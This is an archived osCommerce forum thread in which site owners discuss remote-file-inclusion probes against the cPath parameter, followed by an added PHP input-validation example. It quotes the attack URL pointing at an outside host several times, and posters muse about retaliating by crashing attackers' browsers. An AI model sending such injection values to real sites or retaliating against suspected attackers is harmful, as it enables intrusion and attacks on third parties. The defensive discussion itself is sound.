bobg7
Posted December 14, 2007

I'm sure a lot of you have seen or read about the folks that are trying to mess with sites using the /index.php?cPath=http://hotraebywka.chat.ru/images/girl? thing.

I was wondering if anyone has found a way to block these jerks or even better when http://hotraebywka.chat.ru/images/girl? is detected they're redirected somewhere else like perhaps the FBI or some kind of dirty trick.

Only reason I'm bringing this up is I'm getting frustrated with these kiddies wasting my bandwidth, at one time I had about 80 of these on at the same time and am showing over 300 hits a day. Granted they don't seem to be doing any damage or at least not yet anyways but it would be nice to have a little payback, why should they have all the fun after all.

Installed Contributions: CCGV, Close Popup, Dynamic Meta Tags, Easy Populate, Froogle Data Feeder, Google Position, Infobox Header Entire Row, Live Support for OSC, PayPal Seal with CC images, Report_m Sales, Shop by Price Revised, SQL Updater, Who's Online Enhancement, Footer, GNA EP Assistant and still going.

germ
Posted December 14, 2007

About the only thing you can do that I'm aware of is ban the IP address.

There's a contribution to do that: Throw em out - IP banning system

I don't know how well it does/doesn't work, nor how easy it is to install.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help

bobg7 (Author)
Posted December 14, 2007

It's a pain to pull each IP address and ban them, what if it was something like a subroutine that would detect the kiddies, redirect them to the FBI, collect their DNS information and auto send an email to their ISP letting them know what their user is doing and that it may be in violation of their TOS.

But then the evil part of me would like to detect them and send them to a page that would bomb their browser with a hundred million popup windows and crashing their PC. But that may be in violation of my ISP's TOS.

germ
Posted December 14, 2007

I'd bet most of them are foreign based, so the FBI wouldn't be of much use.

You could trace the IP addresses and report them to their ISPs, who may/may not decide to do anything.

I'd just as soon start at their fingers, removing body parts one joint at a time, all the way up to their vertebrae..... :-"

photofxplus
Posted December 14, 2007

So how and where are they getting this URL into cPath?

This variable is set in: catalog/includes/application_top.php - about Line 449

Has your application_top page been changed..?

Should look like -

    // calculate category path
    if (isset($HTTP_GET_VARS['cPath'])) {
      $cPath = $HTTP_GET_VARS['cPath'];
    } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) {
      $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']);
    } else {
      $cPath = '';
    }

    if (tep_not_null($cPath)) {
      $cPath_array = tep_parse_category_path($cPath);
      $cPath = implode('_', $cPath_array);
      $current_category_id = $cPath_array[(sizeof($cPath_array)-1)];
    } else {
      $current_category_id = 0;
    }

Somewhere in your pages the URL had to be inserted, possibly through a textbox entry (Create Account, Write Reviews)--

Can you do a text search for the URL in your website and/or database?? Try using just part of the URL rather than all of it - hotraebywka

If you can find out how, you can put a little something there to stop it by filtering input or even redirect if input = URL..

Find it!

Lloyd

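One way to do the input filtering suggested in the last post, as an added example that is not part of the thread or of osCommerce itself: accept cPath only when it has the shape the snippet above produces (numeric category ids joined by "_") and log and refuse anything else. The function names are hypothetical, and it assumes PHP 7+ and that the guard is included before the "calculate category path" block.

```php
<?php
// Added example, not osCommerce code; function names are hypothetical. Assumes PHP 7+.

// A legitimate cPath is empty or a chain of numeric category ids joined
// by "_" (e.g. "3_10_27"), matching the implode('_', ...) in the snippet above.
function cpath_is_valid($value): bool
{
    if (!is_string($value) || strlen($value) > 64) {
        return false;               // arrays (cPath[]=x) and oversized values
    }
    return $value === '' || preg_match('/\A[0-9]+(?:_[0-9]+)*\z/', $value) === 1;
}

// Call before the "calculate category path" block: log and stop on bad input.
function reject_bad_cpath(array $get, string $remoteAddr): void
{
    if (!isset($get['cPath']) || cpath_is_valid($get['cPath'])) {
        return;
    }
    // Keep the log entry single-line and printable so the value cannot forge entries.
    $raw  = is_string($get['cPath']) ? $get['cPath'] : '[non-string]';
    $safe = preg_replace('/[^\x20-\x7e]/', '?', substr($raw, 0, 120));
    error_log("rejected cPath from $remoteAddr: $safe");
    header('HTTP/1.1 400 Bad Request');
    exit;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample values; the last one is the probe quoted in this thread.
    $samples = ['3', '3_10_27', '', '3_', '../etc', ['x'],
                'http://hotraebywka.chat.ru/images/girl?'];
    foreach ($samples as $s) {
        printf("%-45s %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
               cpath_is_valid($s) ? 'accept' : 'reject');
    }
} else {
    // In a web request, check the real query string.
    reject_bad_cpath($_GET, $_SERVER['REMOTE_ADDR'] ?? '-');
}
```

The rejected-request log lines give a ready list of source addresses for an IP-banning contribution, without pulling each one by hand.
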
Archived
This topic is now archived and is closed to further replies.